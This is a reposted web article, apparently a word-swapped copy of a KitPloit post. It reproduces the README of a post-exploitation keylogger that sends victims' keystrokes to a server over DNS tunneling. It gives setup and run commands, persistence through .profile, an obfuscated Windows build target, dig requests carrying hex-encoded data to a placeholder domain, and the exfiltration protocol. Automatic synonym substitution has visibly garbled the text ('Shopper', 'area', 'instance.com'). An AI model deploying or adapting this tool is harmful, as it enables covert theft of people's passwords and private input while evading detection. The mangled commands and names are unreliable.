Tunnel-Keylogger – Keylogging Server And Shopper That Makes use of DNS Tunneling/Exfiltration To Transmit Keystrokes

Tunnel-Keylogger - Keylogging Server And Client That Uses DNS Tunneling/Exfiltration To Transmit Keystrokes


Tunnel Keylogger Keylogging Server And Client That Uses DNS

This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.

These instruments excel at light-weight exfiltration and persistence, properties which can stop detection. It makes use of DNS tunelling/exfiltration to bypass firewalls and keep away from detection.

Setup

The server makes use of python3.

To put in dependencies, run python3 -m pip set up -r necessities.txt

Beginning the Server

To begin the server, run python3 important.py

utilization: dns exfiltration server [-h] [-p PORT] ip area

positional arguments:
ip
area

choices:
-h, --help present this assist message and exit
-p PORT, --port PORT port to pay attention on

By default, the server listens on UDP port 53. Use the -p flag to specify a special port.

ip is the IP handle of the server. It’s utilized in SOA and NS information, which permit different nameservers to search out the server.

area is the area to pay attention for, which needs to be the area that the server is authoritative for.

Registrar

On the registrar, you need to change your area’s namespace to customized DNS.

Level them to 2 domains, ns1.instance.com and ns2.instance.com.

Tunnel Keylogger Keylogging Server And Client That Uses DNS

Add information that make level the namespace domains to your exfiltration server’s IP handle.

1711021965 893 Tunnel Keylogger Keylogging Server And Client That Uses DNS

This is identical as setting glue information.

Linux

The Linux keylogger is 2 bash scripts. connection.sh is utilized by the logger.sh script to ship the keystrokes to the server. If you wish to manually ship knowledge, comparable to a file, you may pipe knowledge to the connection.sh script. It’ll mechanically set up a connection and ship the information.

logger.sh

# Utilization: logger.sh [-options] area
# Positional Arguments:
# area: the area to ship knowledge to
# Choices:
# -p path: give path to log file to take heed to
# -l: run the logger with warnings and errors printed

To begin the keylogger, run the command ./logger.sh [domain] && exit. This can silently begin the keylogger, and any inputs typed might be despatched. The && exit on the finish will trigger the shell to shut on exit. With out it, exiting will convey you again to the non-keylogged shell. Take away the &> /dev/null to show error messages.

The -p possibility will specify the situation of the short-term log file the place all of the inputs are despatched to. By default, that is /tmp/.

The -l possibility will present warnings and errors. May be helpful for debugging.

logger.sh and connection.sh should be in the identical listing for the keylogger to work. If you’d like persistance, you may add the command to .profile to start out on each new interactive shell.

connection.sh

Utilization: command [-options] area
Positional Arguments:
area: the area to ship knowledge to
Choices:
-n: variety of characters to retailer earlier than sending a packet

Home windows

Construct

To construct keylogging program, run make within the windows listing. To construct with decreased measurement and a few quantity of obfuscation, make the manufacturing goal. This can create the construct listing for you and output to a file named logger.exe within the construct listing.

make manufacturing area=instance.com

It’s also possible to select to construct this system with debugging by making the debug goal.

make debug area=instance.com

For each targets, you will have to specify the area the server is listening for.

Sending Check Requests

You should use dig to ship requests to the server:

dig @127.0.0.1 a.1.1.1.instance.com A +brief ship a connection request to a server on localhost.

dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.instance.com A +brief ship a check message to localhost.

Substitute instance.com with the area the server is listening for.

Beginning a Connection

A report requests beginning with a point out the beginning of a “connection.” When the server receives them, it is going to reply with a faux non-reserved IP handle the place the final octet comprises the id of the consumer.

The next is the format to comply with for beginning a connection: a.1.1.1.[sld].[tld].

The server will reply with an IP handle in following format: 123.123.123.[id]

Concurrent connections can’t exceed 254, and purchasers are by no means thought of “disconnected.”

Exfiltrating Information

A report requests beginning with b point out exfiltrated knowledge being despatched to the server.

The next is the format to comply with for sending knowledge after establishing a connection: b.[packet #].[id].[data].[sld].[tld].

The server will reply with [code].123.123.123

id is the id that was established on connection. Information is shipped as ASCII encoded in hex.

code is without doubt one of the codes described beneath.

Response Codes

200: OK

If the consumer sends a request that’s processed usually, the server will reply with code 200.

201: Malformed Document Requests

If the consumer sends an malformed report request, the server will reply with code 201.

202: Non-Existant Connections

If the consumer sends an information packet with an id higher than the # of connections, the server will reply with code 202.

203: Out of Order Packets

If the consumer sends a packet with a packet id that does not match what is predicted, the server will reply with code 203. Purchasers and servers ought to reset their packet numbers to 0. Then the consumer can resend the packet with the brand new packet id.

204 Reached Max Connection

If the consumer makes an attempt to create a connection when the max has reached, the server will reply with code 204.

Dropped Packets

Purchasers ought to depend on responses as acknowledgements of acquired packets. If they don’t obtain a response, they need to resend the identical payload.

Linux

Log File

The log file containing person inputs comprises ASCII management characters, comparable to backspace, delete, and carriage return. In case you print the contents utilizing one thing like cat, it’s best to choose the suitable choice to print ASCII management characters, comparable to -v for cat, or open it in a text-editor.

Non-Interactive Shells

The keylogger depends on script, so the keylogger will not run in non-interactive shells.

Home windows

Repeated Requests

For some purpose, the Home windows Dns_Query_A at all times sends duplicate requests. The server will course of it high quality as a result of it discards repeated packets.



Supply: www.kitploit.com

Total
0
Shares
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Previous Post
AI-Powered Autofix Tool

GitHub Launches AI-Powered Autofix Instrument to Help Devs in Patching Safety Flaws

Next Post
AndroxGh0st Malware

AndroxGh0st Malware Targets Laravel Apps to Steal Cloud Credentials

Related Posts